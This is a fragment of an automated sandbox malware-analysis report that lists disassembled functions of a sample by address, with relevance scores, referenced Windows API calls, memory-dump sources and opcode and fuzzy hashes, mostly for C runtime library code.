                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                            • Opcode ID: 0008bce29e6a7ea5a7bea1dab7c6bfd996e360174adfa5d32bd81f8338427ad4
                                                                                                                                                                                                                            • Instruction ID: 350b7baf356bd5904bfc1c9687715fd033cad1a8c964c6157f6dabe69d21c040
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0008bce29e6a7ea5a7bea1dab7c6bfd996e360174adfa5d32bd81f8338427ad4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB419522D1878183E7508B62D5503797AA0FF95768F20A334E65C87AD2DFFCA5E08780
                                                                                                                                                                                                                            Function 00007FF60299BCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                            • Opcode ID: 7209dc663bbfaa75001d9845d7b1af01743ff14c1cf771d7fb5f586bdd48a898
                                                                                                                                                                                                                            • Instruction ID: b7b9356ad5a55b928777e94a0a17de5c20705d3763f0d0dde715089fcd499a0c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7209dc663bbfaa75001d9845d7b1af01743ff14c1cf771d7fb5f586bdd48a898
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17317C61E0C20359FA24EB6FE8253B92B91EF8536CF744435DA4DC72D3CEACA4248655
                                                                                                                                                                                                                            Function 00007FF6029A88B0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                            • Opcode ID: 205ef20cba553258a07b4e5b1a28b7b5785d0b46ba7497e06d71b4c8f33a9e6a
                                                                                                                                                                                                                            • Instruction ID: 9a007f0666420e4d7041a5893a123ca9cb0fe9fa884e9a7e8633036fec6013ba
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 205ef20cba553258a07b4e5b1a28b7b5785d0b46ba7497e06d71b4c8f33a9e6a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4D05210F1870242EB882BB26D880380A217F88B08F301838C81F92393CEBCE80C4341
                                                                                                                                                                                                                            Function 00007FF60299F1AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: dcd1b08ab3e8a4c219a3f5f357765a6aef2eded004205aec5bb7af617af62006
                                                                                                                                                                                                                            • Instruction ID: 998075c39b645b2ba98ab7247dbb11e5454c8815537b76ca234d5d851e161d4d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcd1b08ab3e8a4c219a3f5f357765a6aef2eded004205aec5bb7af617af62006
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7951B561B092424AFB649A2B940167AAA91FF44BBCF344635DE6DC7BC7CFBCE4118640
                                                                                                                                                                                                                            Function 00007FF6029AAFB4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                            • Opcode ID: f023d18367858f18f4ffc712da8a58e22864b16336d0f87c2cad14ba99512c22
                                                                                                                                                                                                                            • Instruction ID: ed8095bd25b491aed934fdcb7a8c0b8e932c7821cba3110966821639a74f91ce
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f023d18367858f18f4ffc712da8a58e22864b16336d0f87c2cad14ba99512c22
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8411B262B08B9181DB208B26A44416DBB61BF45BF8F640331EA7D877DACFBCD4518780
                                                                                                                                                                                                                            Function 00007FF6029A4984 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029A4899), ref: 00007FF6029A49B7
                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029A4899), ref: 00007FF6029A49CD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                                            • Opcode ID: ceb5b27e1429273ec0f7cd93d37e8177472f7336ef6eaae4f88032c19ae1003e
                                                                                                                                                                                                                            • Instruction ID: 4ee5baf10f4dbfd2d12e3964e968c7271cfeaf7a6e633013ad6840531a036a10
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ceb5b27e1429273ec0f7cd93d37e8177472f7336ef6eaae4f88032c19ae1003e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B119132A0C74282EB548B16E41103ABB60FF84B69F701235E69EC19D9EFACD054DB40
                                                                                                                                                                                                                            Function 00007FF6029A97C8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                            • Opcode ID: b1596b6fce52f676d4bad6ff3411658b405adf7fc7dbd3d5caa429018a3dbca6
                                                                                                                                                                                                                            • Instruction ID: c1ef8718d4314062da51e0168fbdbbce0fb19b58c02bab99904b67e8b4e7e050
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1596b6fce52f676d4bad6ff3411658b405adf7fc7dbd3d5caa429018a3dbca6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E0C250F0D70342FF096FF3A8851342A91AF99748F705030C90DC3263DEFC68818290
                                                                                                                                                                                                                            Function 00007FF6029A99D8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,00007FF6029A9855,?,?,00000000,00007FF6029A990A), ref: 00007FF6029A9A46
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6029A9855,?,?,00000000,00007FF6029A990A), ref: 00007FF6029A9A50
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                            • Opcode ID: 137615f181f8dfd138897848f1ccea2caa8bc1983952df4cf4225e009fac3311
                                                                                                                                                                                                                            • Instruction ID: 79c5a3a18abf57b1e96ba64f7831baa2bad8bd9448e0ecc91dfeb0959f6ab3d9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 137615f181f8dfd138897848f1ccea2caa8bc1983952df4cf4225e009fac3311
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6921D111F0878200FF90976695812BD6E92BF857A8F241235DA2EC73C7CEECE4408380
                                                                                                                                                                                                                            Function 00007FF6029AAD2C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 397be0e33a3ad7b691b8968870fb8992b5bec9431ad9d0c0752245266f352eca
                                                                                                                                                                                                                            • Instruction ID: 6fd7b923c715f0588f5677fe6d3fb500a8d752ada4680f537129e062fd3c31ea
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 397be0e33a3ad7b691b8968870fb8992b5bec9431ad9d0c0752245266f352eca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73416032D0874287EB24DB1AA5402797BA0EF56B59F340131DADEC76A2CFADE402C691
                                                                                                                                                                                                                            Function 00007FF6029975F0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                            • Opcode ID: 9c615c680ffff7006ebf3951ab616ab3334d79f18373dfca4bfb5c2dc4b7d2be
                                                                                                                                                                                                                            • Instruction ID: a6c5cb69d1d697780ce9219e97b5c32afa3a8b591fdd7e471665879650063fca
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c615c680ffff7006ebf3951ab616ab3334d79f18373dfca4bfb5c2dc4b7d2be
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA219161B286524AFA149A5B69043FADE41FF45BE8FA84430EE0D87B87CEBDE0518301
                                                                                                                                                                                                                            Function 00007FF6029AA7BC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 60f322b2767f5a80851727f1f59b690dbf5e7c558015800bb25c387afd9b68ae
                                                                                                                                                                                                                            • Instruction ID: cbfd74a20de804c0d90bdf18e89bae1158b8eae33ce13d410f3799eb8dadd14d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60f322b2767f5a80851727f1f59b690dbf5e7c558015800bb25c387afd9b68ae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16316B31E1875286E751AB5AC84137C6EA0AF50BA9F710135EA1D833D3CEFCA842C7D5
                                                                                                                                                                                                                            Function 00007FF6029A87E1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                            • Opcode ID: 6e90e20efa956f9b14c185cb5a53837b01591a8022c61905a8b4379ec8da0186
                                                                                                                                                                                                                            • Instruction ID: 90882475058344241d220eed6ba1eda22e0dc81863438f94088fdfcf8b07d7dc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e90e20efa956f9b14c185cb5a53837b01591a8022c61905a8b4379ec8da0186
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B218E32E147458AEB649F69C4442EC3BB0FF4471CF644A3AD62C86AC6DFB8D484C780
                                                                                                                                                                                                                            Function 00007FF6029A4FF4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: cb19defa627178e49106467df727be20a8e9bfb9e75dc61aeb2f7622f0478853
                                                                                                                                                                                                                            • Instruction ID: 718a1bb65d13f63d3b0dff19f7c56cf15311cef6b5c8f46307f4ee4f79e1465f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb19defa627178e49106467df727be20a8e9bfb9e75dc61aeb2f7622f0478853
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE116021E1C74182FB609F13D800279AAA4BF95B88F746031EA8D97A9BCFFDD41087C1
                                                                                                                                                                                                                            Function 00007FF6029B53BC Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 29e5ed0ae5cace574c450553634763957b08ab45ee51775de7c74767efaf917a
                                                                                                                                                                                                                            • Instruction ID: 602330cc4b712b00caed7cf949e521f77b59001d23ab2421726efea78f481217
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29e5ed0ae5cace574c450553634763957b08ab45ee51775de7c74767efaf917a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F218732A0864187D7629F1AE5403797AA1FF84B58F754234E65DC76D6DFBCD4058B00
                                                                                                                                                                                                                            Function 00007FF60299F42C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 70126ac7fec55f7d0bd94c5b9190ce1d02d48622baccf79bcc7dcf74a444fe57
                                                                                                                                                                                                                            • Instruction ID: dd93d2f177b16c2fd1ec70aee48b0e0778ba38d88a9ad839edef21e7b10bd0ea
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70126ac7fec55f7d0bd94c5b9190ce1d02d48622baccf79bcc7dcf74a444fe57
